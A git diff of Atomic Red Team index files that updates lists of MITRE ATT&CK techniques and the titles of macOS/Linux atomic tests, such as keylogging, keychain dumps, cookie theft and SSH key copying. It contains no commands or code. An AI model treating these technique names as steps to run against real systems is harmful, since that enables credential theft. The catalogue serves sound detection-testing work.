 - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -332,6 +490,7 @@
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #8: MacOS Swift Keylogger [macos]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1123 Audio Capture](../../T1123/T1123.md)
   - Atomic Test #3: using Quicktime Player [macos]
 - T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -339,6 +498,7 @@
 - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1115 Clipboard Data](../../T1115/T1115.md)
   - Atomic Test #3: Execute commands from clipboard [macos]
@@ -346,7 +506,9 @@
 - T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -355,122 +517,57 @@
   - Atomic Test #1: AppleScript - Prompt User for Password [macos]
   - Atomic Test #3: AppleScript - Spoofing a credential prompt using osascript [macos]
 - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # lateral-movement
 - [T1021.005 Remote Services:VNC](../../T1021.005/T1021.005.md)
   - Atomic Test #1: Enable Apple Remote Desktop Agent [macos]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.004 Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.002 Remote Services: SMB/Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.006 Remote Services: Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.003 Remote Services: Distributed Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# privilege-escalation
-- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
-  - Atomic Test #1: Sudo usage [macos, linux]
-  - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
-  - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
-  - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
-  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
-  - Atomic Test #1: Logon Scripts - Mac [macos]
-- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
-  - Atomic Test #1: Launch Daemon [macos]
-  - Atomic Test #2: Launch Daemon - Users Directory [macos]
-- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
-  - Atomic Test #3: Enable Guest Account on macOS [macos]
-- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap EXIT [macos, linux]
-  - Atomic Test #3: Trap SIGINT [macos, linux]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
-  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
-- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
-  - Atomic Test #1: Make and modify binary from C source [macos, linux]
-  - Atomic Test #3: Set a SetUID flag on file [macos, linux]
-  - Atomic Test #5: Set a SetGID flag on file [macos, linux]
-- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
-  - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
-- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
-  - Atomic Test #2: Add macOS LoginItem using Applescript [macos]
-- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
-  - Atomic Test #1: Persistance with Event Monitor - emond [macos]
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
-  - Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
-  - Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
-- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
-  - Atomic Test #1: Add command to .bash_profile [macos, linux]
-  - Atomic Test #2: Add command to .bashrc [macos, linux]
-- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
-  - Atomic Test #1: Add file to Local Library StartupItems [macos]
-  - Atomic Test #2: Add launch script to launch daemon [macos]
-  - Atomic Test #3: Add launch script to launch agent [macos]
-- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
-  - Atomic Test #1: Launch Agent [macos]
-  - Atomic Test #2: Event Monitor Daemon Persistence [macos]
-  - Atomic Test #3: Launch Agent - Root Directory [macos]
-- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
-  - Atomic Test #1: rc.common [macos]
-- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
-  - Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
-  - Atomic Test #2: Re-Opened Applications using LoginHook [macos]
-  - Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
-- T1548.006 TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
-  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
-  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
-  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+- T1563.002 Remote Service Session Hijacking: RDP Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.001 Remote Services: Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #8: MacOS Swift Keylogger [macos]
 - T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
   - Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
-- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
-  - Atomic Test #1: Keychain Dump [macos]
-  - Atomic Test #2: Export Certificate Item(s) [macos]
-  - Atomic Test #3: Import Certificate Item(s) into Keychain [macos]
+- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
   - Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
   - Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
+- T1552.002 Unsecured Credentials: Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552 Unsecured Credentials](../../T1552/T1552.md)
   - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #2: Search macOS Safari Cookies [macos]
   - Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
@@ -479,17 +576,21 @@
   - Atomic Test #2: Discover Private SSH Keys [linux, macos]
   - Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
   - Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.001 OS Credential Dumping: LSASS Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
-  - Atomic Test #1: Search Through Bash History [linux, macos]
 - [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #1: Find AWS credentials [macos, linux]
   - Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
   - Atomic Test #3: Extract passwords with grep [linux, macos]
   - Atomic Test #6: Find and Access Github Credentials [linux, macos]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -500,10 +601,19 @@
 - [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
   - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.006 OS Credential Dumping: DCSync [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # discovery
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
@@ -511,6 +621,7 @@
 - [T1016.001 System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md)
   - Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
@@ -539,6 +650,7 @@
   - Atomic Test #33: sysctl to gather macOS hardware info [macos]
 - T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
   - Atomic Test #1: Delay execution with ping [linux, macos]
 - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
@@ -549,6 +661,7 @@
   - Atomic Test #3: System Network Configuration Discovery [macos, linux]
   - Atomic Test #8: List macOS Firewall Rules [macos]
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
   - Atomic Test #3: Nix File and Directory Discovery [linux, macos]
   - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
@@ -564,6 +677,7 @@
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
   - Atomic Test #8: Examine password policy - macOS [macos]
 - T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1012 Query Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1614 System Location Discovery](../../T1614/T1614.md)
   - Atomic Test #2: Get geolocation info through IP-Lookup services using curl freebsd, linux or macos [macos, linux]
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
@@ -580,37 +694,6 @@
 - [T1124 System Time Discovery](../../T1124/T1124.md)
   - Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
 
-# execution
-- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
-  - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
-  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
-  - Atomic Test #1: AppleScript [macos]
-- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
-  - Atomic Test #1: Launchctl [macos]
-- T1559.003 XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
-  - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
-  - Atomic Test #2: Command-Line Interface [linux, macos]
-  - Atomic Test #14: Shell Creation using awk command [linux, macos]
-  - Atomic Test #15: Creating shell using cpan command [linux, macos]
-  - Atomic Test #17: emacs spawning an interactive system shell [linux, macos]
-- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
 # impact
 - T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -625,8 +708,10 @@
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1531 Account Access Removal](../../T1531/T1531.md)
   - Atomic Test #4: Change User Password via passwd [macos, linux]
@@ -657,6 +742,7 @@
 - T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/office-365-index.md b/atomics/Indexes/Indexes-Markdown/office-365-index.md
index 90952a5669..e16f79be66 100644
--- a/atomics/Indexes/Indexes-Markdown/office-365-index.md
+++ b/atomics/Indexes/Indexes-Markdown/office-365-index.md
@@ -16,26 +16,17 @@
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
-# impact
-- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
